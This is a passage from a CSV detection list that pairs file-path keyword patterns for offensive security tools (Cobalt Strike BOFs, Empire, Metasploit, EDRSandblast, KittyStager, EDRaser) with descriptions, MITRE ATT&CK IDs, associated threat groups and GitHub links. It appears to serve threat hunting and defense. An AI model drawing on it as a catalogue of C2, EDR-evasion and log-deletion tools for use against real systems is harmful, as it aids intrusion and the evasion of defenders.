TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*/edraser.py*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*/edr-checker/*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/EDRSandblast.git*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*/EDRSandblast/*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*/EfsPotato.git*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*/egghunter.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Egress-Assess*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/elevateit.bat*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*/ElevateKit/elevate.*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*/elf/dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/elf/exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/ELFLoader/*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" +"*/Elite/Elite*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/email_spoof_checks.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"*/EmailAll.git*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"*/emailall.py*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"*/EmbedInHTML.git*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*/EmbedInHTML/*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*/emotet.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/Empire.git","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/empire/client/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/empire:latest*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/empire_exec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/EmpireProject*","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" +"*/enable-user.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/enableuser/enableuser.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/enableuser/enableuser.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/enc_shellcode.bin*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*/enc_shellcode.h*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*/enip-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/enum__secrets/*.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/enum_av.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_av.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/enum_av.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/enum_cisco.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_dns.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/enum_domain_info*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/enum_f5.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_juniper.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_osx.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_proxy.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_services.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 